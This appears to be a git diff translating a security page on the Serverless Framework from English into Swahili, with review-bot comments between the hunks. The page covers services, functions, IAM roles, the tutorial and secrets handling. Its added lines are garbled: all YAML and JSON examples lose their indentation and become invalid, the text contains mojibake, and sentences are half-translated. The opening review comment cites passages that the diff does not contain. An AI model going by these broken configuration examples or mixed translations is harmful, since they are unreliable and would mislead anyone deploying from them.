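Review bot: the nested sub-bullets lose their indentation in the translated list (the `+` lines for "Kumbuka kwamba..." and "Kwa hili..." sit at the same level as their parents, where the removed lines were indented two spaces), so the two notes no longer render as children of the points they qualify; re-indent them. The same flattening hits the "3PE Command Injection" sub-bullet. Two wording problems in the same hunk: the Secrets sub-bullet leaves the English word "cannot" untranslated in "ikiwa mshambuliaji cannot kubadilisha", and the translation carries over the acronym mismatch `**I-DDE**` for what the same line calls an Indirect PPE attack; since the Secrets bullet already refers to it as I-PPE, this is a good moment to correct the label to `**I-PPE**`.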
diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md
index bf1343702..181687cb4 100644
--- a/src/pentesting-ci-cd/serverless.com-security.md
+++ b/src/pentesting-ci-cd/serverless.com-security.md
@@ -6,7 +6,7 @@
### Organization
-An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications.
+An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **kikundi cha pamoja**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications.
### Team
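Review bot: only the phrase "collective group" is translated on the `+` line ("kikundi cha pamoja") while the rest of the Organization sentence stays in English, so the paragraph reads as a mix of two languages; translate the whole sentence, or leave the line untouched until the full paragraph can be translated.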
@@ -19,181 +19,163 @@ An **App** is a logical grouping of related services within an Organization. It
### **Services**
A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables.
-
```yaml
service: my-service
provider:
- name: aws
- runtime: nodejs14.x
+name: aws
+runtime: nodejs14.x
functions:
- hello:
- handler: handler.hello
+hello:
+handler: handler.hello
```
-
Function
-A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events.
-
-It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings.
+A **Function** inawakilisha kazi moja isiyo na seva, kama kazi ya AWS Lambda. Inajumuisha msimbo unaotekelezwa kama jibu kwa matukio.
+Imeainishwa chini ya sehemu ya `functions` katika `serverless.yml`, ikitaja mpangilio, mazingira ya utekelezaji, matukio, mabadiliko ya mazingira, na mipangilio mingine.
```yaml
functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
```
-
Event
-**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed.
-
-Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more.
+**Matukio** ni vichocheo vinavyosababisha kazi zako zisizo na seva. Vinabainisha jinsi na lini kazi inapaswa kutekelezwa.
+Aina za matukio za kawaida ni pamoja na maombi ya HTTP, matukio ya ratiba (kazi za cron), matukio ya hifadhidata, upakuaji wa faili, na mengineyo.
```yaml
functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- - schedule:
- rate: rate(10 minutes)
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+- schedule:
+rate: rate(10 minutes)
```
-
-Resource
+Rasilimali
-**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles.
-
-They are specified under the `resources` section, often using CloudFormation syntax for AWS.
+**Rasilimali** zinakuwezesha kufafanua rasilimali za ziada za wingu ambazo huduma yako inategemea, kama vile hifadhidata, ndoo za hifadhi, au majukumu ya IAM.
+Zinabainishwa chini ya sehemu ya `resources`, mara nyingi kwa kutumia sintaksia ya CloudFormation kwa AWS.
```yaml
resources:
- Resources:
- MyDynamoDBTable:
- Type: AWS::DynamoDB::Table
- Properties:
- TableName: my-table
- AttributeDefinitions:
- - AttributeName: id
- AttributeType: S
- KeySchema:
- - AttributeName: id
- KeyType: HASH
- ProvisionedThroughput:
- ReadCapacityUnits: 1
- WriteCapacityUnits: 1
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+TableName: my-table
+AttributeDefinitions:
+- AttributeName: id
+AttributeType: S
+KeySchema:
+- AttributeName: id
+KeyType: HASH
+ProvisionedThroughput:
+ReadCapacityUnits: 1
+WriteCapacityUnits: 1
```
-
-Provider
+Mtoa huduma
The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider.
-It includes details like the runtime, region, stage, and credentials.
-
+Inajumuisha maelezo kama vile runtime, eneo, hatua, na akreditivu.
```yaml
yamlCopy codeprovider:
- name: aws
- runtime: nodejs14.x
- region: us-east-1
- stage: dev
+name: aws
+runtime: nodejs14.x
+region: us-east-1
+stage: dev
```
-
-Stage and Region
-
-The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments.
+Hatua na Eneo
+Hatua inawakilisha mazingira tofauti (kwa mfano, maendeleo, uanzishaji, uzalishaji) ambapo huduma yako inaweza kuwekwa. Inaruhusu usanidi na uwekaji wa mazingira maalum.
```yaml
provider:
- stage: dev
+stage: dev
```
-
-The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations.
-
+Mkoa unaelezea eneo la kijiografia ambapo rasilimali zako zitawekwa. Ni muhimu kwa sababu za ucheleweshaji, kufuata sheria, na upatikanaji.
```yaml
provider:
- region: us-west-2
+region: us-west-2
```
-
Plugins
-**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm.
-
+**Plugins** huongeza uwezo wa Serverless Framework kwa kuongeza vipengele vipya au kuunganishwa na zana na huduma nyingine. Zimefafanuliwa chini ya sehemu ya `plugins` na zinawekwa kupitia npm.
```yaml
plugins:
- - serverless-offline
- - serverless-webpack
+- serverless-offline
+- serverless-webpack
```
-
-Layers
-
-**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions.
+Tabaka
+**Tabaka** zinakuwezesha kufunga na kusimamia msimbo au utegemezi wa pamoja tofauti na kazi zako. Hii inakuza matumizi tena na kupunguza ukubwa wa pakiti za kutekeleza. Zinå®ä¹åØ`layers` sehemu na kutajwa na kazi.
```yaml
layers:
- commonLibs:
- path: layer-common
+commonLibs:
+path: layer-common
functions:
- hello:
- handler: handler.hello
- layers:
- - { Ref: CommonLibsLambdaLayer }
+hello:
+handler: handler.hello
+layers:
+- { Ref: CommonLibsLambdaLayer }
```
-
Variables and Custom Variables
-**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time.
+**Variables** zinawezesha usanidi wa dinamik kwa kuruhusu matumizi ya nafasi za kubadilisha ambazo zinatatuliwa wakati wa kutekeleza.
-- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters.
+- **Syntax:** `${variable}` syntax inaweza kurejelea mazingira ya mazingira, maudhui ya faili, au vigezo vingine vya usanidi.
- ```yaml
- functions:
- hello:
- handler: handler.hello
- environment:
- TABLE_NAME: ${self:custom.tableName}
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
+```
-* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`.
+* **Custom Variables:** Sehemu ya `custom` inatumika kufafanua vigezo na usanidi maalum wa mtumiaji ambavyo vinaweza kutumika tena katika `serverless.yml`.
- ```yaml
- custom:
- tableName: my-dynamodb-table
- stage: ${opt:stage, 'dev'}
- ```
+```yaml
+custom:
+tableName: my-dynamodb-table
+stage: ${opt:stage, 'dev'}
+```
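Review bot: every `+` YAML line in this hunk has lost its leading indentation (for example `+name: aws` and `+runtime: nodejs14.x` under `provider:`, and `+path: hello` / `+method: get` under the `http:` list item), which changes or breaks the documents: indentation is structural in YAML, so `provider:` followed by `name: aws` at column 0 is no longer a mapping with a `name` key. Restore the original indentation in all the YAML blocks touched here (Services, Function, Event, Resources, Provider, Stage, Region, Plugins, Layers, Variables, Custom Variables); a translation pass should not modify code content at all. Also in this hunk: the Layers paragraph contains mojibake ("Zinå®ä¹åØ`layers`") that needs to be retyped, the Variables and Custom Variables fences are de-indented out of their list items so they no longer nest under the bullets, and the `yamlCopy codeprovider:` artifact in the Provider block could have been cleaned up to `provider:` while the block was being edited.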
@@ -201,103 +183,92 @@ functions:
Outputs
-**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment.
-
+**Outputs** zinafafanua thamani ambazo zinarejeshwa baada ya huduma kutekelezwa, kama vile ARNs za rasilimali, maeneo ya mwisho, au taarifa nyingine muhimu. Zinabainishwa chini ya sehemu ya `outputs` na mara nyingi hutumiwa kufichua taarifa kwa huduma nyingine au kwa ufikiaji rahisi baada ya kutekelezwa.
```yaml
”outputs:
- ApiEndpoint:
- Description: "API Gateway endpoint URL"
- Value:
- Fn::Join:
- - ""
- - - "https://"
- - Ref: ApiGatewayRestApi
- - ".execute-api."
- - Ref: AWS::Region
- - ".amazonaws.com/"
- - Ref: AWS::Stage
+ApiEndpoint:
+Description: "API Gateway endpoint URL"
+Value:
+Fn::Join:
+- ""
+- - "https://"
+- Ref: ApiGatewayRestApi
+- ".execute-api."
+- Ref: AWS::Region
+- ".amazonaws.com/"
+- Ref: AWS::Stage
```
-
IAM Roles and Permissions
-**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions.
-
+**IAM Roles and Permissions** zinaelezea sifa za usalama na haki za ufikiaji kwa kazi zako na rasilimali nyingine. Zinapaswa kusimamiwa chini ya mipangilio ya `provider` au mipangilio ya kazi binafsi ili kubainisha ruhusa zinazohitajika.
```yaml
provider:
- [...]
- iam:
- role:
- statements:
- - Effect: 'Allow'
- Action:
- - 'dynamodb:PutItem'
- - 'dynamodb:Get*'
- - 'dynamodb:Scan*'
- - 'dynamodb:UpdateItem'
- - 'dynamodb:DeleteItem'
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
```
-
-Environment Variables
-
-**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions.
+Vigezo vya Mazingira
+**Vigezo** vinakuruhusu kupitisha mipangilio na siri kwa kazi zako bila kuzihardcode. Vimewekwa chini ya sehemu ya `environment` kwa mtoa huduma au kazi binafsi.
```yaml
provider:
- environment:
- STAGE: ${self:provider.stage}
+environment:
+STAGE: ${self:provider.stage}
functions:
- hello:
- handler: handler.hello
- environment:
- TABLE_NAME: ${self:custom.tableName}
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
```
-
Dependencies
-**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`.
-
+**Dependencies** husimamia maktaba na moduli za nje ambazo kazi zako zinahitaji. Kwa kawaida zinashughulikiwa kupitia wasimamizi wa pakiti kama npm au pip, na kufungwa na kifurushi chako cha kutekeleza kwa kutumia zana au nyongeza kama `serverless-webpack`.
```yaml
plugins:
- - serverless-webpack
+- serverless-webpack
```
-
Hooks
-**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments.
-
+**Hooks** hukuruhusu kuendesha skripti au amri maalum katika hatua maalum za mzunguko wa maisha ya kutekeleza. Zinapangwa kwa kutumia plugins au ndani ya `serverless.yml` ili kutekeleza vitendo kabla au baada ya kutekeleza.
```yaml
custom:
- hooks:
- before:deploy:deploy: echo "Starting deployment..."
+hooks:
+before:deploy:deploy: echo "Starting deployment..."
```
-
### Tutorial
-This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial):
-
-1. Create an AWS account (Serverless.com start in AWS infrastructure)
-2. Create an account in serverless.com
-3. Create an app:
+Hii ni muhtasari wa mafunzo rasmi [**kutoka kwenye hati**](https://www.serverless.com/framework/docs/tutorial):
+1. Unda akaunti ya AWS (Serverless.com inaanza katika miundombinu ya AWS)
+2. Unda akaunti katika serverless.com
+3. Unda programu:
```bash
# Create temp folder for the tutorial
mkdir /tmp/serverless-tutorial
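Review bot: same indentation loss on the YAML `+` lines for Outputs, IAM Roles, Environment Variables, Dependencies and Hooks (e.g. `+statements:` and `+- Effect: 'Allow'` at column 0 under `role:`, and `+before:deploy:deploy:` at column 0 under `hooks:`), which makes these examples invalid as YAML; restore the original indentation. The stray `”` in the unchanged context line `”outputs:` could be dropped in the same pass since the block is already being rewritten.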
@@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API)
## Create A New App
## Indicate a name like "tutorialapp)
```
-
-This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function:
+Hii inapaswa kuwa imetengeneza **app** inayoitwa `tutorialapp` ambayo unaweza kuangalia katika [serverless.com](serverless.com-security.md) na folda inayoitwa `Tutorial` yenye faili **`handler.js`** inayokuwa na baadhi ya msimbo wa JS wenye msimbo wa `helloworld` na faili **`serverless.yml`** ikitangaza kazi hiyo:
{{#tabs }}
{{#tab name="handler.js" }}
-
```javascript
exports.hello = async (event) => {
- return {
- statusCode: 200,
- body: JSON.stringify({
- message: "Go Serverless v4! Your function executed successfully!",
- }),
- }
+return {
+statusCode: 200,
+body: JSON.stringify({
+message: "Go Serverless v4! Your function executed successfully!",
+}),
+}
}
```
-
{{#endtab }}
{{#tab name="serverless.yml" }}
-
```yaml
# "org" ensures this Service is used with the correct Serverless Framework Access Key.
org: testing12342
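Review bot: the handler.js body (`+return {` through `+}`) is de-indented; JavaScript still parses, but the whitespace-only change makes the diff noisy and the example harder to read, and code blocks should be excluded from the translation pass. The blank lines between `{{#tab ...}}` and the opening fence are also removed; check that the tabs still render the fenced block as code rather than merging it with the directive line.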
@@ -342,130 +309,122 @@ app: tutorialapp
service: Tutorial
provider:
- name: aws
- runtime: nodejs20.x
+name: aws
+runtime: nodejs20.x
functions:
- hello:
- handler: handler.hello
- events:
- - httpApi:
- path: /
- method: get
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
```
-
{{#endtab }}
{{#endtabs }}
-4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`.
- 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
- 2. This template generates a role called **`SFRole-`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role.
+4. Unda mtoa huduma wa AWS, ukitembea kwenye **dashibodi** katika `https://app.serverless.com//settings/providers?providerId=new&provider=aws`.
+1. Ili kutoa `serverless.com` ufikiaji wa AWS itahitaji kuendesha stack ya cloudformation ikitumia faili hii ya usanidi (wakati wa kuandika hii): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
+2. Kiolezo hiki kinaunda jukumu linaloitwa **`SFRole-`** lenye **`arn:aws:iam::aws:policy/AdministratorAccess`** juu ya akaunti yenye Kitambulisho cha Kuamini kinachoruhusu akaunti ya `Serverless.com` ya AWS kufikia jukumu hilo.
Yaml roleTemplate
-
```yaml
Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments.
Resources:
- SFRole:
- Type: AWS::IAM::Role
- Properties:
- AssumeRolePolicyDocument:
- Version: "2012-10-17"
- Statement:
- - Effect: Allow
- Principal:
- AWS: arn:aws:iam::486128539022:root
- Action:
- - sts:AssumeRole
- Condition:
- StringEquals:
- sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
- Path: /
- RoleName: !Ref RoleName
- ManagedPolicyArns:
- - arn:aws:iam::aws:policy/AdministratorAccess
- ReporterFunction:
- Type: Custom::ServerlessFrameworkReporter
- Properties:
- ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
- OrgUid: !Ref OrgUid
- RoleArn: !GetAtt SFRole.Arn
- Alias: !Ref Alias
+SFRole:
+Type: AWS::IAM::Role
+Properties:
+AssumeRolePolicyDocument:
+Version: "2012-10-17"
+Statement:
+- Effect: Allow
+Principal:
+AWS: arn:aws:iam::486128539022:root
+Action:
+- sts:AssumeRole
+Condition:
+StringEquals:
+sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
+Path: /
+RoleName: !Ref RoleName
+ManagedPolicyArns:
+- arn:aws:iam::aws:policy/AdministratorAccess
+ReporterFunction:
+Type: Custom::ServerlessFrameworkReporter
+Properties:
+ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
+OrgUid: !Ref OrgUid
+RoleArn: !GetAtt SFRole.Arn
+Alias: !Ref Alias
Outputs:
- SFRoleArn:
- Description: "ARN for the IAM Role used by Serverless Framework"
- Value: !GetAtt SFRole.Arn
+SFRoleArn:
+Description: "ARN for the IAM Role used by Serverless Framework"
+Value: !GetAtt SFRole.Arn
Parameters:
- OrgUid:
- Description: Serverless Framework Org Uid
- Type: String
- Alias:
- Description: Serverless Framework Provider Alias
- Type: String
- RoleName:
- Description: Serverless Framework Role Name
- Type: String
+OrgUid:
+Description: Serverless Framework Org Uid
+Type: String
+Alias:
+Description: Serverless Framework Provider Alias
+Type: String
+RoleName:
+Description: Serverless Framework Role Name
+Type: String
```
-
-Trust Relationship
-
+Uhusiano wa Kuamini
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam::486128539022:root"
- },
- "Action": "sts:AssumeRole",
- "Condition": {
- "StringEquals": {
- "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
- }
- }
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::486128539022:root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {
+"StringEquals": {
+"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
+}
+}
+}
+]
}
```
-
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas.
+5. Mafunzo yanahitaji kuunda faili `createCustomer.js` ambayo kimsingi itaunda kiunganishi kipya cha API kinachoshughulikiwa na faili mpya ya JS na yanahitaji kubadilisha faili `serverless.yml` ili kufanya iweze kuunda **meza mpya ya DynamoDB**, kufafanua **kigezo cha mazingira**, jukumu ambalo litakuwa likitumia lambdas zilizozalishwa.
{{#tabs }}
{{#tab name="createCustomer.js" }}
-
```javascript
"use strict"
const AWS = require("aws-sdk")
module.exports.createCustomer = async (event) => {
- const body = JSON.parse(Buffer.from(event.body, "base64").toString())
- const dynamoDb = new AWS.DynamoDB.DocumentClient()
- const putParams = {
- TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
- Item: {
- primary_key: body.name,
- email: body.email,
- },
- }
- await dynamoDb.put(putParams).promise()
- return {
- statusCode: 201,
- }
+const body = JSON.parse(Buffer.from(event.body, "base64").toString())
+const dynamoDb = new AWS.DynamoDB.DocumentClient()
+const putParams = {
+TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
+Item: {
+primary_key: body.name,
+email: body.email,
+},
+}
+await dynamoDb.put(putParams).promise()
+return {
+statusCode: 201,
+}
}
```
-
{{#endtab }}
{{#tab name="serverless.yml" }}
-
```yaml
# "org" ensures this Service is used with the correct Serverless Framework Access Key.
org: testing12342
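Review bot: the nested steps under item 4 (`+1. Ili kutoa ...`, `+2. Kiolezo hiki ...`) lose their indentation, so they become a new top-level list that restarts at 1 instead of sub-steps 4.1 and 4.2; re-indent them. The roleTemplate YAML `+` lines (`+SFRole:`, `+Type: AWS::IAM::Role`, `+Properties:` ... all at column 0) are no longer a valid CloudFormation template, and the trust-policy JSON is de-indented as well; restore the original indentation of both blocks, since the template is quoted as the exact artifact a user is asked to deploy.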
@@ -475,388 +434,379 @@ app: tutorialapp
service: Tutorial
provider:
- name: aws
- runtime: nodejs20.x
- environment:
- DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
- iam:
- role:
- statements:
- - Effect: "Allow"
- Action:
- - "dynamodb:PutItem"
- - "dynamodb:Get*"
- - "dynamodb:Scan*"
- - "dynamodb:UpdateItem"
- - "dynamodb:DeleteItem"
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+name: aws
+runtime: nodejs20.x
+environment:
+DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
+iam:
+role:
+statements:
+- Effect: "Allow"
+Action:
+- "dynamodb:PutItem"
+- "dynamodb:Get*"
+- "dynamodb:Scan*"
+- "dynamodb:UpdateItem"
+- "dynamodb:DeleteItem"
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
functions:
- hello:
- handler: handler.hello
- events:
- - httpApi:
- path: /
- method: get
- createCustomer:
- handler: createCustomer.createCustomer
- events:
- - httpApi:
- path: /
- method: post
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
+createCustomer:
+handler: createCustomer.createCustomer
+events:
+- httpApi:
+path: /
+method: post
resources:
- Resources:
- CustomerTable:
- Type: AWS::DynamoDB::Table
- Properties:
- AttributeDefinitions:
- - AttributeName: primary_key
- AttributeType: S
- BillingMode: PAY_PER_REQUEST
- KeySchema:
- - AttributeName: primary_key
- KeyType: HASH
- TableName: ${self:service}-customerTable-${sls:stage}
+Resources:
+CustomerTable:
+Type: AWS::DynamoDB::Table
+Properties:
+AttributeDefinitions:
+- AttributeName: primary_key
+AttributeType: S
+BillingMode: PAY_PER_REQUEST
+KeySchema:
+- AttributeName: primary_key
+KeyType: HASH
+TableName: ${self:service}-customerTable-${sls:stage}
```
-
{{#endtab }}
{{#endtabs }}
-6. Deploy it running **`serverless deploy`**
- 1. The deployment will be performed via a CloudFormation Stack
- 2. Note that the **lambdas are exposed via API gateway** and not via direct URLs
-7. **Test it**
- 1. The previous step will print the **URLs** where your API endpoints lambda functions have been deployed
+6. Tumia **`serverless deploy`**
+1. Utekelezaji utafanywa kupitia CloudFormation Stack
+2. Kumbuka kwamba **lambdas zinapatikana kupitia API gateway** na si kupitia URLs za moja kwa moja
+7. **Jaribu**
+1. Hatua ya awali itachapisha **URLs** ambapo kazi za lambda za mwisho wa API zako zimewekwa
-## Security Review of Serverless.com
+## Mapitio ya Usalama wa Serverless.com
-### **Misconfigured IAM Roles and Permissions**
+### **Mifumo na Ruhusa za IAM Zilizokosewa**
-Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation.
+Mifumo ya IAM iliyo na ruhusa nyingi inaweza kutoa ufikiaji usioidhinishwa kwa rasilimali za wingu, na kusababisha uvujaji wa data au upotoshaji wa rasilimali.
-When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like:
+Wakati hakuna ruhusa zilizotajwa kwa kazi ya Lambda, mfumo wenye ruhusa za kuzalisha tu kumbukumbu utaundwa, kama:
-Minimum lambda permissions
-
+Ruhusa za chini za lambda
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Action": [
- "logs:CreateLogStream",
- "logs:CreateLogGroup",
- "logs:TagResource"
- ],
- "Resource": [
- "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
- ],
- "Effect": "Allow"
- },
- {
- "Action": ["logs:PutLogEvents"],
- "Resource": [
- "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
- ],
- "Effect": "Allow"
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Action": [
+"logs:CreateLogStream",
+"logs:CreateLogGroup",
+"logs:TagResource"
+],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
+],
+"Effect": "Allow"
+},
+{
+"Action": ["logs:PutLogEvents"],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
+],
+"Effect": "Allow"
+}
+]
}
```
-
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Principle of Least Privilege:** Assign only necessary permissions to each function.
-
- ```yaml
- provider:
- [...]
- iam:
- role:
- statements:
- - Effect: 'Allow'
- Action:
- - 'dynamodb:PutItem'
- - 'dynamodb:Get*'
- - 'dynamodb:Scan*'
- - 'dynamodb:UpdateItem'
- - 'dynamodb:DeleteItem'
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
- ```
-
-- **Use Separate Roles:** Differentiate roles based on function requirements.
-
----
-
-### **Insecure Secrets and Configuration Management**
-
-Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised.
-
-The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**!
-
-> [!CAUTION]
-> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!**
-
-For example, the following example will use SSM to get an environment variable:
+- **Kanuni ya Haki Ndogo:** Panga ruhusa zinazohitajika tu kwa kila kazi.
```yaml
provider:
- environment:
- DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
```
+- **Tumia Majukumu Mbalimbali:** Tofautisha majukumu kulingana na mahitaji ya kazi.
+
+---
+
+### **Siri zisizo Salama na Usimamizi wa Mipangilio**
+
+Kuhifadhi taarifa nyeti (mfano, funguo za API, akidi za database) moja kwa moja katika **`serverless.yml`** au msimbo kunaweza kusababisha kufichuliwa ikiwa hifadhi zitashambuliwa.
+
+Njia **iliyopendekezwa** ya kuhifadhi mabadiliko ya mazingira katika faili ya **`serverless.yml`** kutoka serverless.com (wakati wa kuandika hii) ni kutumia watoa huduma wa `ssm` au `s3`, ambao unaruhusu kupata **maadili ya mazingira kutoka vyanzo hivi wakati wa kutekeleza** na **kuunda** mabadiliko ya mazingira ya **lambdas** na **maandishi yasiyo na maadili**!
+
+> [!CAUTION]
+> Hivyo, mtu yeyote mwenye ruhusa ya kusoma mipangilio ya lambdas ndani ya AWS ataweza **kufikia mabadiliko haya yote ya mazingira kwa maandiko wazi!**
+
+Kwa mfano, mfano ufuatao utatumia SSM kupata mabadiliko ya mazingira:
+```yaml
+provider:
+environment:
+DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+```
And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**.
> [!TIP]
-> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**.
+> Njia inayopendekezwa ya kuhifadhi mabadiliko ya mazingira kwa kutumia serveless.com ingekuwa **kuhifadhi katika siri ya AWS** na kuhifadhi tu jina la siri katika mabadiliko ya mazingira na **kodhi ya lambda inapaswa kukusanya hiyo**.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.**
-- **Encrypted Variables:** Leverage Serverless Frameworkās encryption features for sensitive data.
-- **Access Controls:** Restrict access to secrets based on roles.
+- **Ushirikiano wa Meneja wa Siri:** Tumia huduma kama **AWS Secrets Manager.**
+- **Mabadiliko Yaliyosimbwa:** Tumia vipengele vya usimbaji vya Serverless Framework kwa data nyeti.
+- **Udhibiti wa Ufikiaji:** Punguza ufikiaji wa siri kulingana na majukumu.
---
-### **Vulnerable Code and Dependencies**
+### **Msimbo na Kazi Zenye Ukatili**
-Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks.
+Kazi au utegemezi zisizokuwa na usalama zinaweza kuleta udhaifu, wakati usimamizi mbaya wa ingizo unaweza kusababisha mashambulizi ya kuingiza msimbo.
-#### **Mitigation Strategies**
+#### **Mikakati ya Kupunguza**
-- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities.
+- **Usimamizi wa Utegemezi:** Sasisha mara kwa mara utegemezi na scan kwa udhaifu.
- ```yaml
- plugins:
- - serverless-webpack
- - serverless-plugin-snyk
- ```
+```yaml
+plugins:
+- serverless-webpack
+- serverless-plugin-snyk
+```
-- **Input Validation:** Implement strict validation and sanitization of all inputs.
-- **Code Reviews:** Conduct thorough reviews to identify security flaws.
